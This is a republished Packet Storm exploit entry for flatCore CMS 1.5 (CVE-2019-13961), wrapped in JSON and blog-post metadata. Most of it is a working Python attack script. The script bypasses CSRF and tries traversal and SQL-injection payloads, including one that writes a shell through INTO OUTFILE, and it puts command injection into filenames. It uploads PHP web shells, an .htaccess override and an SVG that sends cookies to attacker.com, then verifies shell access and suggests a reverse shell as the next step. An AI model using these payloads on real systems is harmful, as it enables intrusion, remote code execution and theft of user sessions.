{“lastseen”:”2025-12-15T16:52:43″,”description”:”flatCore version 1.5 proof of concept remote shell upload exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 flatCore 1.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:212821″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2019-13961″],”sourceData”:”=============================================================================================================================================\\n | # Title : flatCore 1.5 Advanced File Upload Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/flatCore\/flatCore-CMS\/blob\/main\/acp\/core\/files.upload-script.php |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/190428\/ \\u0026\\tCVE-2019-13961\\n \\n [+] Summary : The upload script contains multiple critical vulnerabilities that can be chained together for complete system compromise. \\n The most urgent issues are the CSRF bypass and unrestricted file upload, which allow unauthenticated attackers to upload PHP shells and execute arbitrary code.\\n \\n \\t\\t \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import sys\\n import time\\n import random\\n import string\\n import os\\n from concurrent.futures import ThreadPoolExecutor\\n \\n class FileUploadExploit:\\n def __init__(self, target_url, session_cookie):\\n self.target_url = target_url\\n self.session_cookie = session_cookie\\n self.headers = {\\n ‘Cookie’: f’PHPSESSID={session_cookie}’,\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n }\\n self.successful_payloads = []\\n \\n def generate_random_string(self, length=8):\\n \\”\\”\\”Generate random string for filenames\\”\\”\\”\\n return ”.join(random.choices(string.ascii_lowercase + string.digits, k=length))\\n \\n def test_csrf_bypass(self):\\n \\”\\”\\”Test CSRF token bypass by omitting token\\”\\”\\”\\n print(\\”\\\\n[+] Testing CSRF Token Bypass…\\”)\\n \\n files = {\\n ‘file’: (‘test.txt’, ‘CSRF test content’, ‘text\/plain’)\\n }\\n \\n data = {\\n ‘upload_destination’: ‘images’,\\n ‘upload_type’: ‘images’,\\n ‘unchanged’: ‘yes’\\n # No csrf_token parameter\\n }\\n \\n try:\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=15,\\n allow_redirects=False\\n )\\n \\n if response.status_code == 200:\\n print(\\”[\u2713] CSRF bypass successful (no token required)\\”)\\n return True\\n else:\\n print(f\\”[-] CSRF check may be active: {response.status_code}\\”)\\n return False\\n \\n except Exception as e:\\n print(f\\”[-] Error testing CSRF: {e}\\”)\\n return False\\n \\n def directory_traversal_attack(self):\\n \\”\\”\\”Test directory traversal in upload_destination parameter\\”\\”\\”\\n print(\\”\\\\n[+] Testing Directory Traversal…\\”)\\n \\n traversal_payloads = [\\n ‘..\/..\/..\/index.php’,\\n ‘..\/..\/..\/..\/etc\/passwd’,\\n ‘..\/..\/..\/..\/..\/..\/..\/var\/www\/html’,\\n ‘..\\\\\\\\..\\\\\\\\..\\\\\\\\windows\\\\\\\\win.ini’,\\n ‘..\/’ * 20 + ‘etc\/passwd’,\\n ‘images\/..\/..\/..\/..\/tmp’,\\n ‘\/absolute\/path\/to\/target’\\n ]\\n \\n vulnerable = False\\n \\n for payload in traversal_payloads:\\n print(f\\” Testing: {payload[:50]}…\\”)\\n \\n files = {\\n ‘file’: (‘traversal.txt’, f’Traversal test: {payload}’, ‘text\/plain’)\\n }\\n \\n data = {\\n ‘upload_destination’: payload,\\n ‘upload_type’: ‘files’,\\n ‘unchanged’: ‘yes’,\\n ‘file_mode’: ‘overwrite’\\n }\\n \\n try:\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=10\\n )\\n \\n # Check for unusual success\\n if response.status_code == 200 and len(response.content) \\u003c 500:\\n print(f\\”[\u2713] Possible traversal: {payload}\\”)\\n vulnerable = True\\n \\n except requests.exceptions.Timeout:\\n print(f\\” [!] Timeout with payload: {payload}\\”)\\n except Exception as e:\\n pass\\n \\n return vulnerable\\n \\n def upload_web_shells(self):\\n \\”\\”\\”Upload various web shell types with different bypass techniques\\”\\”\\”\\n print(\\”\\\\n[+] Uploading Web Shells…\\”)\\n \\n shells = [\\n # Basic PHP shell\\n {\\n ‘name’: ‘shell.php’,\\n ‘content’: \\”\\”\\”\\u003c?php\\n if(isset($_GET[‘cmd’])) {\\n system($_GET[‘cmd’]);\\n }\\n if(isset($_POST[‘cmd’])) {\\n system($_POST[‘cmd’]);\\n }\\n echo \\”Web Shell Active\\”;\\n ?\\u003e\\”\\”\\”,\\n ‘mime’: ‘text\/php’\\n },\\n \\n # Double extension\\n {\\n ‘name’: ‘shell.php.jpg’,\\n ‘content’: \\”\\”\\”GIF89a\\n \\u003c?php\\n if(isset($_REQUEST[‘pass’])) {\\n eval($_REQUEST[‘pass’]);\\n }\\n ?\\u003e\\”\\”\\”,\\n ‘mime’: ‘image\/jpeg’\\n },\\n \\n # SVG with PHP\\n {\\n ‘name’: ‘malicious.svg’,\\n ‘content’: \\”\\”\\”\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003c!DOCTYPE svg PUBLIC \\”-\/\/W3C\/\/DTD SVG 1.1\/\/EN\\” \\”http:\/\/www.w3.org\/Graphics\/SVG\/1.1\/DTD\/svg11.dtd\\”\\u003e\\n \\u003csvg version=\\”1.1\\” xmlns=\\”http:\/\/www.w3.org\/2000\/svg\\”\\u003e\\n \\u003c!–\\u003c?php echo shell_exec($_GET[‘c’]); ?\\u003e–\\u003e\\n \\u003crect width=\\”300\\” height=\\”100\\” style=\\”fill:rgb(0,0,255);\\” \/\\u003e\\n \\u003cscript\\u003edocument.location=’http:\/\/attacker.com\/steal?c=’+document.cookie;\\u003c\/script\\u003e\\n \\u003c\/svg\\u003e\\”\\”\\”,\\n ‘mime’: ‘image\/svg+xml’\\n },\\n \\n # .htaccess to allow PHP execution\\n {\\n ‘name’: ‘.htaccess’,\\n ‘content’: \\”\\”\\”AddType application\/x-httpd-php .jpg .png .gif\\n \\u003cFilesMatch \\”\\\\.(jpg|png|gif)$\\”\\u003e\\n SetHandler application\/x-httpd-php\\n \\u003c\/FilesMatch\\u003e\\”\\”\\”,\\n ‘mime’: ‘text\/plain’\\n },\\n \\n # PHP with null bytes (if PHP version \\u003c 5.3.4)\\n {\\n ‘name’: ‘shell.php%00.jpg’,\\n ‘content’: ‘\\u003c?php phpinfo(); ?\\u003e’,\\n ‘mime’: ‘image\/jpeg’\\n }\\n ]\\n \\n uploaded = []\\n \\n for shell in shells:\\n print(f\\” Attempting: {shell[‘name’]}\\”)\\n \\n files = {\\n ‘file’: (shell[‘name’], shell[‘content’], shell[‘mime’])\\n }\\n \\n # Try different upload parameters\\n upload_params = [\\n {\\n ‘upload_destination’: ‘images’,\\n ‘upload_type’: ‘images’,\\n ‘unchanged’: ‘yes’,\\n ‘file_mode’: ‘overwrite’\\n },\\n {\\n ‘upload_destination’: ‘files’,\\n ‘upload_type’: ‘files’,\\n ‘unchanged’: ‘yes’,\\n ‘file_mode’: ‘overwrite’\\n }\\n ]\\n \\n for params in upload_params:\\n try:\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=params,\\n timeout=15\\n )\\n \\n if response.status_code == 200:\\n print(f\\”[\u2713] Uploaded: {shell[‘name’]}\\”)\\n uploaded.append({\\n ‘filename’: shell[‘name’],\\n ‘params’: params\\n })\\n break\\n \\n except Exception as e:\\n print(f\\” [-] Error: {e}\\”)\\n \\n return uploaded\\n \\n def test_sql_injection(self):\\n \\”\\”\\”Test SQL injection via filename or other parameters\\”\\”\\”\\n print(\\”\\\\n[+] Testing SQL Injection…\\”)\\n \\n sql_payloads = [\\n # Time-based SQLi\\n \\”test’ AND SLEEP(5)–.jpg\\”,\\n \\”test’ OR BENCHMARK(5000000,MD5(‘test’))–.jpg\\”,\\n \\n # Error-based SQLi\\n \\”test’ AND ExtractValue(1,CONCAT(0x5c,USER()))–.jpg\\”,\\n \\n # Union-based (if we can see output)\\n \\”test’ UNION SELECT ‘\\u003c?php system($_GET[cmd]); ?\\u003e’ INTO OUTFILE ‘\/var\/www\/html\/shell.php’–.jpg\\”\\n ]\\n \\n for payload in sql_payloads:\\n print(f\\” Testing: {payload}\\”)\\n \\n files = {\\n ‘file’: (payload, ‘SQLi test’, ‘image\/jpeg’)\\n }\\n \\n data = {\\n ‘upload_destination’: ‘images’,\\n ‘upload_type’: ‘images’,\\n ‘unchanged’: ‘yes’\\n }\\n \\n try:\\n start_time = time.time()\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=30\\n )\\n elapsed = time.time() – start_time\\n \\n if elapsed \\u003e 5:\\n print(f\\”[\u2713] Time-based SQLi possible: {elapsed:.2f}s delay\\”)\\n return True\\n \\n if \\”SQL\\” in response.text or \\”syntax\\” in response.text.lower():\\n print(\\”[\u2713] Error-based SQLi detected\\”)\\n return True\\n \\n except requests.exceptions.Timeout:\\n print(\\”[\u2713] Timeout – SQL injection successful\\”)\\n return True\\n except Exception:\\n pass\\n \\n return False\\n \\n def test_path_manipulation(self):\\n \\”\\”\\”Test path manipulation in filename cleaning function\\”\\”\\”\\n print(\\”\\\\n[+] Testing Path Manipulation…\\”)\\n \\n malicious_filenames = [\\n \\”..\/..\/..\/shell.php\\”,\\n \\”….php\\”, # Becomes .php after cleaning\\n \\”shell.php.\\”,\\n \\”shell.php \\”,\\n \\”shell.php%0d%0a.jpg\\”,\\n \\”;ls -la;.jpg\\”,\\n \\”$(whoami).jpg\\”\\n ]\\n \\n for filename in malicious_filenames:\\n print(f\\” Testing filename: {filename}\\”)\\n \\n files = {\\n ‘file’: (filename, ‘test’, ‘text\/plain’)\\n }\\n \\n data = {\\n ‘upload_destination’: ‘files’,\\n ‘upload_type’: ‘files’,\\n ‘unchanged’: ‘yes’\\n }\\n \\n try:\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n print(f\\”[\u2713] Accepted filename: {filename}\\”)\\n \\n except Exception:\\n pass\\n \\n def test_file_size_limit_bypass(self):\\n \\”\\”\\”Test file size limit bypass\\”\\”\\”\\n print(\\”\\\\n[+] Testing File Size Limit Bypass…\\”)\\n \\n # Create a large file\\n large_content = \\”A\\” * (1024 * 1024 * 100) # 100MB\\n \\n files = {\\n ‘file’: (‘large_file.txt’, large_content, ‘text\/plain’)\\n }\\n \\n data = {\\n ‘upload_destination’: ‘files’,\\n ‘upload_type’: ‘files’,\\n ‘unchanged’: ‘yes’,\\n ‘fz’: ‘999999999’ # Set huge file size limit\\n }\\n \\n try:\\n print(\\” Uploading 100MB file…\\”)\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=60\\n )\\n \\n if response.status_code == 200:\\n print(\\”[\u2713] Large file upload possible\\”)\\n return True\\n \\n except Exception as e:\\n print(f\\” [-] Error: {e}\\”)\\n \\n return False\\n \\n def brute_force_upload_locations(self):\\n \\”\\”\\”Brute force potential upload locations\\”\\”\\”\\n print(\\”\\\\n[+] Brute Forcing Upload Locations…\\”)\\n \\n common_locations = [\\n ‘images’,\\n ‘files’,\\n ‘uploads’,\\n ‘upload’,\\n ‘media’,\\n ‘content’,\\n ‘img’,\\n ‘pictures’,\\n ‘docs’,\\n ‘assets’,\\n ‘tmp’,\\n ‘temp’,\\n ‘cache’\\n ]\\n \\n found_locations = []\\n \\n for location in common_locations:\\n files = {\\n ‘file’: (‘test.txt’, ‘test’, ‘text\/plain’)\\n }\\n \\n data = {\\n ‘upload_destination’: location,\\n ‘upload_type’: ‘files’,\\n ‘unchanged’: ‘yes’\\n }\\n \\n try:\\n response = requests.post(\\n self.target_url,\\n headers=self.headers,\\n files=files,\\n data=data,\\n timeout=10\\n )\\n \\n if response.status_code == 200:\\n print(f\\”[\u2713] Found location: {location}\\”)\\n found_locations.append(location)\\n \\n except Exception:\\n pass\\n \\n return found_locations\\n \\n def verify_shell_access(self, uploaded_shells, base_url):\\n \\”\\”\\”Verify if uploaded shells are accessible\\”\\”\\”\\n print(\\”\\\\n[+] Verifying Shell Access…\\”)\\n \\n accessible = []\\n \\n # Try common paths\\n test_paths = [\\n f\\”{base_url}\/content\/images\/\\”,\\n f\\”{base_url}\/content\/files\/\\”,\\n f\\”{base_url}\/images\/\\”,\\n f\\”{base_url}\/files\/\\”,\\n f\\”{base_url}\/uploads\/\\”,\\n f\\”{base_url}\/..\/content\/images\/\\”\\n ]\\n \\n for shell in uploaded_shells:\\n for path in test_paths:\\n shell_url = f\\”{path}{shell[‘filename’]}\\”\\n \\n try:\\n # Test PHP shell\\n if shell[‘filename’].endswith(‘.php’):\\n test_url = f\\”{shell_url}?cmd=echo+SUCCESS\\”\\n response = requests.get(test_url, timeout=10)\\n \\n if \\”SUCCESS\\” in response.text or \\”Web Shell Active\\” in response.text:\\n print(f\\”[\u2713] Shell accessible: {shell_url}\\”)\\n accessible.append(shell_url)\\n break\\n \\n # Test file existence\\n else:\\n response = requests.head(shell_url, timeout=10)\\n if response.status_code == 200:\\n print(f\\”[\u2713] File accessible: {shell_url}\\”)\\n accessible.append(shell_url)\\n break\\n \\n except Exception:\\n pass\\n \\n return accessible\\n \\n def run_full_exploit(self):\\n \\”\\”\\”Run all exploitation techniques\\”\\”\\”\\n print(f\\”[*] Starting comprehensive attack on: {self.target_url}\\”)\\n print(f\\”[*] Using session cookie: {self.session_cookie[:20]}…\\\\n\\”)\\n \\n results = {\\n ‘csrf_bypass’: False,\\n ‘directory_traversal’: False,\\n ‘sql_injection’: False,\\n ‘file_size_bypass’: False,\\n ‘uploaded_shells’: [],\\n ‘found_locations’: [],\\n ‘accessible_shells’: []\\n }\\n \\n # Run tests\\n results[‘csrf_bypass’] = self.test_csrf_bypass()\\n results[‘directory_traversal’] = self.directory_traversal_attack()\\n results[‘sql_injection’] = self.test_sql_injection()\\n results[‘file_size_bypass’] = self.test_file_size_limit_bypass()\\n results[‘found_locations’] = self.brute_force_upload_locations()\\n self.test_path_manipulation()\\n \\n # Upload shells\\n results[‘uploaded_shells’] = self.upload_web_shells()\\n \\n # Extract base URL for verification\\n base_url = self.target_url[:self.target_url.rfind(‘\/’)]\\n base_url = base_url[:base_url.rfind(‘\/’)]\\n \\n # Verify access\\n results[‘accessible_shells’] = self.verify_shell_access(\\n results[‘uploaded_shells’], \\n base_url\\n )\\n \\n # Print summary\\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”[+] EXPLOITATION SUMMARY\\”)\\n print(\\”=\\”*60)\\n \\n for key, value in results.items():\\n if isinstance(value, list):\\n print(f\\”{key.replace(‘_’, ‘ ‘).title()}: {len(value)} found\\”)\\n if value and key in [‘uploaded_shells’, ‘accessible_shells’]:\\n for item in value[:3]: # Show first 3\\n print(f\\” – {item}\\”)\\n else:\\n status = \\”\u2713\\” if value else \\”\u2717\\”\\n print(f\\”{status} {key.replace(‘_’, ‘ ‘).title()}\\”)\\n \\n print(\\”\\\\n[+] Recommended next steps:\\”)\\n if results[‘accessible_shells’]:\\n print(\\” 1. Execute commands via: shell.php?cmd=whoami\\”)\\n print(\\” 2. Upload more advanced reverse shell\\”)\\n print(\\” 3. Explore file system: ?cmd=ls+-la\\”)\\n else:\\n print(\\” 1. Try different upload parameters\\”)\\n print(\\” 2. Check server logs for errors\\”)\\n print(\\” 3. Use directory traversal to find upload location\\”)\\n \\n return results\\n \\n def main():\\n if len(sys.argv) \\u003c 3:\\n print(\\”Usage: python exploit.py \\u003ctarget_url\\u003e \\u003csession_cookie\\u003e\\”)\\n print(\\”Example: python exploit.py http:\/\/target.com\/admin\/upload.php abc123session456\\”)\\n sys.exit(1)\\n \\n target_url = sys.argv[1]\\n session_cookie = sys.argv[2]\\n \\n exploit = FileUploadExploit(target_url, session_cookie)\\n results = exploit.run_full_exploit()\\n \\n # Save results to file\\n with open(‘exploit_results.txt’, ‘w’) as f:\\n import json\\n f.write(json.dumps(results, indent=2))\\n \\n print(\\”\\\\n[*] Results saved to exploit_results.txt\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212821″,”cvss”:{“score”:8.8,”severity”:”HIGH”,”vector”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”baseScore”:8.8,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/212821\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-15T16:52:43″,”description”:”flatCore version 1.5 proof of concept remote shell upload exploit…”,”published”:”2025-12-15T00:00:00″,”modified”:”2025-12-15T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 flatCore 1.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:212821″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2019-13961″],”sourceData”:”=============================================================================================================================================\\n | # Title : flatCore 1.5 Advanced File Upload Exploit |\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,15,13,53,7,11,5],"class_list":["post-31168","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n